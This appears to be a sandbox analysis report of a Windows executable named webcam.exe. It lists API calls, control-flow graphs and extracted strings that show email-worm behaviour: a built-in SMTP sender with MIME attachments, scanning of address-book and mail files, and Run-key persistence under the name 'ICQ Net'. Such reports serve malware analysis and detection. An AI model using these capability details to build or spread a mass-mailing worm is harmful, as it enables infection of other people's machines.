                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Time$InformationLocalZonewsprintf
                                                                                                                                                                                                            • String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$>
                                                                                                                                                                                                            • API String ID: 1715792076-923901428
                                                                                                                                                                                                            • Opcode ID: 4a9d39a1a4b49a15a0af5199b82552f90bc8b5fc0a2882355a9521fa874379f6
                                                                                                                                                                                                            • Instruction ID: a1fd622096a8bf0a5f403f72d1136a8b65eff9f0f4c68601542a21ac2b23e156
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a9d39a1a4b49a15a0af5199b82552f90bc8b5fc0a2882355a9521fa874379f6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD3121B0D003189ACF10DFC5D8085EEBBF6EF05718F00806AE655B6290D3BC59A5CB5E
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 504 403085-403094 GetCurrentThread SetThreadPriority 505 40309a-4030a9 GetLocalTime 504->505 506 4030ab-4030b0 505->506 507 4030ef-4030f7 Sleep 505->507 506->507 508 4030b2-4030b8 506->508 507->505 508->507 509 4030ba-4030bf 508->509 510 4030c1-4030c6 509->510 511 4030cf-4030e9 call 401d73 * 2 Beep 509->511 510->511 512 4030c8-4030cd 510->512 511->507 512->507 512->511
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Thread$BeepCurrentLocalPrioritySleepTime
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 322507061-0
                                                                                                                                                                                                            • Opcode ID: e7d7355b9173c2046c153bffd65369e90e1cb392ad8c99d8a323b2e8ebad37a6
                                                                                                                                                                                                            • Instruction ID: 666856a2101ccab237df132475821c9f98106921f9c098f37887d323279d59a2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7d7355b9173c2046c153bffd65369e90e1cb392ad8c99d8a323b2e8ebad37a6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28F08C20D41205AACF10BFA0D90E87E7A7DAB0031AF11C52BA152721D2ABB90BC4836E
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetVersion.KERNEL32 ref: 00403B2A
                                                                                                                                                                                                              • Part of subcall function 00404683: HeapCreate.KERNELBASE(00000000,00001000,00000000,00403B63,00000000), ref: 00404694
                                                                                                                                                                                                              • Part of subcall function 00404683: HeapDestroy.KERNEL32 ref: 004046B2
                                                                                                                                                                                                            • GetCommandLineA.KERNEL32 ref: 00403B78
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00403BC6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$CommandCreateDestroyHandleLineModuleVersion
                                                                                                                                                                                                            • String ID: x%I
                                                                                                                                                                                                            • API String ID: 2736944706-1112590633
                                                                                                                                                                                                            • Opcode ID: c1a7a2cec080945146dc668cefc1699e97db2957981a3824a0b34371f317d2c6
                                                                                                                                                                                                            • Instruction ID: d46f6c68c26d4c1b299e5b91e5fb46e43711b55dc765b057d004a842d80414bb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1a7a2cec080945146dc668cefc1699e97db2957981a3824a0b34371f317d2c6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A218EB1944714AADB04AFA6DC06AAE7BB9EF45705F10413EF601BB2D1DB3C4940CB59
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • send.WS2_32(00000002,00000000,00000000,00000000), ref: 00401DC1
                                                                                                                                                                                                            • recv.WS2_32(00000002,?,00000001,00000000), ref: 00401DF5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: recvsend
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 740075404-0
                                                                                                                                                                                                            • Opcode ID: 517a9e016b700c8772a2e7f1b3bafd8337e68351bd005c7d94a544a7751204c2
                                                                                                                                                                                                            • Instruction ID: 68de028cd3e712b94d0dd286207e4a41eea24123e07cfa277c59af56183adfc3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 517a9e016b700c8772a2e7f1b3bafd8337e68351bd005c7d94a544a7751204c2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B721F6311000049EDB319E68CC88BEA7BAAEF05758F100177EA45FA1F1D779994AC78D
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 0 401e62-401e89 call 4037d0 4 401e8b-401e8f 0->4 5 401ead-401eb4 0->5 8 401e91-401e97 4->8 9 401e9b-401ea7 lstrcpy 4->9 6 402785 5->6 7 401eba-401ecb call 40156c 5->7 11 402787-40278b 6->11 7->6 14 401ed1-401efa lstrcpy call 4037c5 gethostbyname 7->14 8->4 15 401e99 8->15 9->5 14->6 18 401f00-401f85 call 403280 call 4032f0 htons socket setsockopt * 2 connect 14->18 15->5 23 401f87-401f89 18->23 24 401f8e-401f9c call 401d73 18->24 25 402778-402783 closesocket 23->25 28 401fb4-401fbf call 401d73 24->28 29 401f9e-401fb2 call 401d73 24->29 25->11 34 401fc6-401ff3 call 401d73 call 401d9b 28->34 29->34 39 402757-40275b 34->39 40 401ff9-401ffe 34->40 41 40276a-402777 shutdown 39->41 42 40275d-402769 call 40379b 39->42 40->39 43 402004-40204f call 403630 call 403640 * 2 call 401d9b 40->43 41->25 42->41 54 402051-402056 43->54 55 402058-40209e call 403630 call 403640 * 2 call 401d9b 43->55 54->55 56 4020af-4020f4 call 403630 call 403640 * 2 call 401d9b 54->56 55->39 73 4020a4-4020a9 55->73 56->39 74 4020fa-4020ff 56->74 73->39 73->56 74->39 75 402105-402147 call 403630 call 403640 * 2 call 401d9b 74->75 75->39 84 40214d-402152 75->84 84->39 85 402158-40217e call 403630 call 401d9b 84->85 85->39 90 402184-402189 85->90 90->39 91 40218f-4021cf call 401d73 * 2 call 403630 call 401d73 90->91 100 4021d1-402200 call 403640 call 401d73 call 403640 91->100 101 402203-402207 91->101 100->101 103 402314-402322 call 401d73 101->103 104 40220d-402235 GetWindowsDirectoryA call 403720 101->104 112 402344-40238a call 401d73 call 403640 call 403630 103->112 113 402324-402343 call 401d73 call 403640 103->113 114 402237-402249 call 403640 104->114 115 40224a-40226d call 403630 call 401d73 104->115 144 40238b-40267a call 403630 call 403640 * 9 call 401b67 call 403640 * 2 call 403720 send call 401d73 * 3 wsprintfA call 403630 call 403640 * 5 call 403720 send call 403630 call 403640 * 2 call 403630 call 403640 call 403720 send call 401d73 call 403720 send call 403630 call 403640 * 6 call 403720 send _lopen 112->144 113->112 114->115 132 40228f-4022f9 call 401d73 call 403640 * 3 call 4017ad 115->132 133 40226f-40228e call 401d73 call 403640 115->133 160 4022fe-402312 call 403630 132->160 133->132 144->39 235 402680-402691 call 401cb2 144->235 160->144 235->39 238 402697-4026a2 _lclose 235->238 239 4026b1-402715 call 403630 call 403640 * 2 call 403630 call 403640 call 401d9b 238->239 240 4026a4-4026b0 call 40379b 238->240 254 40271a-40271f 239->254 240->239 254->39 255 402721-402726 254->255 255->39 256 402728-402755 call 403630 call 403720 send 255->256 256->39
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,00000001), ref: 00401EA7
                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000004), ref: 00401EDC
                                                                                                                                                                                                            • gethostbyname.WS2_32(?), ref: 00401EF0
                                                                                                                                                                                                            • htons.WS2_32(00000019), ref: 00401F28
                                                                                                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 00401F38
                                                                                                                                                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,?), ref: 00401F60
                                                                                                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00001005,00003A98,?), ref: 00401F71
                                                                                                                                                                                                            • connect.WS2_32(?,00000002,00000010), ref: 00401F7C
                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 0040221A
                                                                                                                                                                                                            • send.WS2_32(?,?,00000000,00000000), ref: 00402479
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004024A1
                                                                                                                                                                                                            • send.WS2_32(?,?,00000000,00000000), ref: 0040252E
                                                                                                                                                                                                            • send.WS2_32(?,?,00000000,00000000), ref: 004025A2
                                                                                                                                                                                                            • send.WS2_32(?,0040AB98,00000000,00000000), ref: 004025C6
                                                                                                                                                                                                            • send.WS2_32(?,?,00000000,00000000), ref: 00402664
                                                                                                                                                                                                            • _lopen.KERNEL32(?,00000000), ref: 0040266F
                                                                                                                                                                                                            • shutdown.WS2_32(?,00000002), ref: 0040276F
                                                                                                                                                                                                              • Part of subcall function 00401CB2: _hread.KERNEL32(00000000,00000048,00000001), ref: 00401CD4
                                                                                                                                                                                                              • Part of subcall function 00401CB2: send.WS2_32(00000000,?,00000001,00000000), ref: 00401D16
                                                                                                                                                                                                              • Part of subcall function 00401CB2: send.WS2_32(00000000,0040AB98,00000002,00000000), ref: 00401D4F
                                                                                                                                                                                                            • _lclose.KERNEL32(00000000), ref: 00402698
                                                                                                                                                                                                            • send.WS2_32(?,?,00000000,00000000), ref: 00402755
                                                                                                                                                                                                              • Part of subcall function 0040379B: DeleteFileA.KERNELBASE(?,00402769,?), ref: 0040379F
                                                                                                                                                                                                              • Part of subcall function 0040379B: GetLastError.KERNEL32 ref: 004037A9
                                                                                                                                                                                                            • closesocket.WS2_32(?), ref: 0040277B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: send$lstrcpysetsockopt$DeleteDirectoryErrorFileLastWindows_hread_lclose_lopenclosesocketconnectgethostbynamehtonsshutdownsocketwsprintf
                                                                                                                                                                                                            • String ID: $--$.$MIME-Version: 1.0$"$"$"Content-Transfer-Encoding: base64Content-Disposition: attachment;filename="$--$----=_NextPart_%.3u_%.4u_%.8X.%.8X$.zip$>$Content-Type: application/octet-stream;name="$Content-Type: application/x-zip-compressed;name="$Content-Type: multipart/mixed;boundary="$Content-Type: text/plain;charset="Windows-1252"Content-Transfer-Encoding: 7bit$DATA$Date: $EHLO $From: $HELO $MAIL FROM: <$QUIT$RCPT TO: <$Subject: $This is a multi-part message in MIME format.$To: $X-MSMail-Priority: Normal$X-Priority: 3$\
                                                                                                                                                                                                            • API String ID: 3478418677-3520763247
                                                                                                                                                                                                            • Opcode ID: daaacdc70ee3e646fb58c61556225893349485dd7ac7c14b70f4c701aa7bb07b
                                                                                                                                                                                                            • Instruction ID: ad1650301917ef9bdeae7df7c3b8aa9d762db0040f3838a3b6728485160f7748
                                                                                                                                                                                                            • Opcode Fuzzy Hash: daaacdc70ee3e646fb58c61556225893349485dd7ac7c14b70f4c701aa7bb07b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 023242B2D002187ADB20EFA1DD46FDEB7BD9B08704F1004BBB605F21D1D679AB548B69
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 00402ECA
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00402F1C
                                                                                                                                                                                                            • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 00402F45
                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(?,ICQ Net,00000000,00000001,?,00000000), ref: 00402F6B
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402F74
                                                                                                                                                                                                            • RegDeleteKeyA.ADVAPI32(80000000,CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32), ref: 00402FB9
                                                                                                                                                                                                              • Part of subcall function 00402E72: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00402E7F
                                                                                                                                                                                                              • Part of subcall function 00402E72: RegDeleteValueA.KERNELBASE(?,?), ref: 00402E8F
                                                                                                                                                                                                              • Part of subcall function 00402E72: RegCloseKey.KERNELBASE(?), ref: 00402E98
                                                                                                                                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\PINF), ref: 00403053
                                                                                                                                                                                                            • RegDeleteKeyA.ADVAPI32(80000002,System\CurrentControlSet\Services\WksPatch ), ref: 0040305F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Delete$CloseOpenValue$CopyDirectoryFileWindows
                                                                                                                                                                                                            • String ID: -stealth$CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32$DELETE ME$Explorer$ICQ Net$KasperskyAv$OLE$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices$Sentry$Software\Microsoft\Windows\CurrentVersion\Explorer\PINF$System\CurrentControlSet\Services\WksPatch $Taskmon$Windows Services Host$\$au.exe$d3dupdate.exe$msgsvr32$service$system.$winlogon.exe
                                                                                                                                                                                                            • API String ID: 2778398710-2502385722
                                                                                                                                                                                                            • Opcode ID: e203d9d93130e63325ec6b4449cefa42c11d833b288b1e7fc9bb28794195d0b6
                                                                                                                                                                                                            • Instruction ID: 84feb7293dd50699fc8e53e7ee761e706d635917d92738f507599102555b4bc5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e203d9d93130e63325ec6b4449cefa42c11d833b288b1e7fc9bb28794195d0b6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 174184A25C031475C620B772CD4EF9B3A6CDF65759F60007BBA09710C2CABC991046FE
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 309 4010a4-4010ee call 403280 312 4010f0-4010f3 309->312 313 4010f5-401107 getservbyname 309->313 314 401111 htons 312->314 315 401109-40110d 313->315 316 40110f 313->316 317 401113-401126 inet_addr 314->317 315->317 316->314 318 401128-401133 gethostbyname 317->318 319 40113f-401150 socket 317->319 320 401135-40113c 318->320 321 40115a-40115c 318->321 322 401152 319->322 323 40115e-40121e htons * 2 call 401000 htons * 2 setsockopt * 2 sendto 319->323 320->319 324 401154-401155 321->324 322->324 328 401220 323->328 329 401225-401241 recvfrom 323->329 326 401264-401267 324->326 330 401222-401223 328->330 331 401243-40124e WSAGetLastError 329->331 332 401258 329->332 333 40125a-401263 closesocket 330->333 334 401250-401252 331->334 335 401254-401256 331->335 332->333 333->326 334->330 335->333
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • getservbyname.WS2_32(nameserver,UDP), ref: 004010FF
                                                                                                                                                                                                            • htons.WS2_32(00000035), ref: 00401111
                                                                                                                                                                                                            • inet_addr.WS2_32(00000000), ref: 0040111A
                                                                                                                                                                                                            • gethostbyname.WS2_32(00000000), ref: 0040112B
                                                                                                                                                                                                            • socket.WS2_32(00000002,00000002,00000000), ref: 00401144
                                                                                                                                                                                                            • htons.WS2_32(000011DF), ref: 00401164
                                                                                                                                                                                                            • htons.WS2_32(00000001), ref: 00401176
                                                                                                                                                                                                            • htons.WS2_32(00000002), ref: 004011B6
                                                                                                                                                                                                            • htons.WS2_32(00000001), ref: 004011C2
                                                                                                                                                                                                            • setsockopt.WS2_32(0000000F,0000FFFF,00001006,?,?), ref: 004011ED
                                                                                                                                                                                                            • setsockopt.WS2_32(0000000F,0000FFFF,00001005,00000FA0,?), ref: 004011FF
                                                                                                                                                                                                            • sendto.WS2_32(0000000F,00000000,-00000010,00000000,00000002,00000010), ref: 00401215
                                                                                                                                                                                                            • recvfrom.WS2_32(0000000F,00408030,00000800,00000000,00000002,00408030), ref: 00401238
                                                                                                                                                                                                            • WSAGetLastError.WS2_32(?,74DF05F0,?), ref: 00401243
                                                                                                                                                                                                            • closesocket.WS2_32(0000000F), ref: 0040125B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: htons$setsockopt$ErrorLastclosesocketgethostbynamegetservbynameinet_addrrecvfromsendtosocket
                                                                                                                                                                                                            • String ID: UDP$nameserver
                                                                                                                                                                                                            • API String ID: 2147619886-4175462922
                                                                                                                                                                                                            • Opcode ID: c2c4ea1a7d312aeaef9fa15988cadba241fcaab0d9df87588d876636e5593e70
                                                                                                                                                                                                            • Instruction ID: 54f4538c7bcc46d7fdc4aaefdd6ffe4718887d5174617e4dee6c76f625f832c1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2c4ea1a7d312aeaef9fa15988cadba241fcaab0d9df87588d876636e5593e70
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F251C331500258AADB10AF64DC45BDEB7B9FF04320F204276FA56FA2E1DBB44A518BD9
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 336 402a51-402a73 call 4037d0 call 402a20 341 402c53-402c57 336->341 342 402a79-402a8b call 403720 336->342 346 402a90-402aa1 call 403800 342->346 349 402aa3 346->349 350 402aa5-402aa9 346->350 349->350 350->346 351 402aab-402aad 350->351 351->341 352 402ab3-402ac4 _lopen 351->352 352->341 353 402aca-402af1 call 403630 352->353 356 402af4-402b00 _hread 353->356 357 402b06-402b32 call 403720 CharLowerBuffA call 403a80 356->357 358 402c4a-402c4d _lclose 356->358 363 402b38-402b49 call 403a80 357->363 364 402bef-402c13 call 40278e call 4027b4 call 4028a4 357->364 358->341 363->364 370 402b4f-402b60 call 403a80 363->370 377 402c16-402c33 _llseek call 403630 364->377 370->364 376 402b66-402b77 call 403a80 370->376 376->364 382 402b79-402b8a call 403a80 376->382 381 402c38-402c45 377->381 381->356 385 402bd4-402bed call 40278e call 4028a4 382->385 386 402b8c-402b9d call 403a80 382->386 396 402bd1-402bd2 385->396 386->385 392 402b9f-402bb0 call 403a80 386->392 392->385 397 402bb2-402bc3 call 403a80 392->397 396->377 397->385 400 402bc5-402bcc call 4028a4 397->400 400->396
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _lopen.KERNEL32(?,00000000), ref: 00402AB8
                                                                                                                                                                                                            • _hread.KERNEL32(?,?,00001000), ref: 00402AF4
                                                                                                                                                                                                            • CharLowerBuffA.USER32(00000000,00000000), ref: 00402B1B
                                                                                                                                                                                                            • _llseek.KERNEL32(?,?,00000000), ref: 00402C1E
                                                                                                                                                                                                            • _lclose.KERNEL32(?), ref: 00402C4D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: BuffCharLower_hread_lclose_llseek_lopen
                                                                                                                                                                                                            • String ID: .@$.adb$.dbx$.doc$.msg$.oft$.sht$.tbb$.wab$~A
                                                                                                                                                                                                            • API String ID: 4116433239-3774032708
                                                                                                                                                                                                            • Opcode ID: f94fbc363f65885cc776d653e02bf959290bd37ae85559714c094d146decd2f4
                                                                                                                                                                                                            • Instruction ID: f2dafe6271f346f72b0dcdc4685929b99cb8ccfb922ebbe08748fce3a86fe255
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f94fbc363f65885cc776d653e02bf959290bd37ae85559714c094d146decd2f4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9651D676600209BAEF15EFA1DE49ADE7B7CDF04326F2041BBF400B10D1DBB89E904A18
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 402 4017ad-4017dd CreateFileA 403 4019e0-4019e2 402->403 404 4017e3-4017e5 402->404 406 4019e3-4019e7 403->406 404->403 405 4017eb-401804 CreateFileA 404->405 407 40180a-40180c 405->407 408 4019db-4019de 405->408 407->408 410 401812-4018fb call 403280 * 3 call 4019e8 call 401a6d GetFileSize * 2 WriteFile * 2 SetFilePointer 407->410 409 4019ce-4019d9 408->409 409->406 425 401901-401920 ReadFile 410->425 426 401922-401925 425->426 427 401943-4019c5 WriteFile * 3 425->427 426->427 428 401927-401941 WriteFile 426->428 427->409 428->425
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,0040AB98,00000400,000000C8), ref: 004017D5
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004017FA
                                                                                                                                                                                                              • Part of subcall function 004019E8: GetSystemTime.KERNEL32(0000002E,0000002E,?,00000000,0000001E), ref: 004019F2
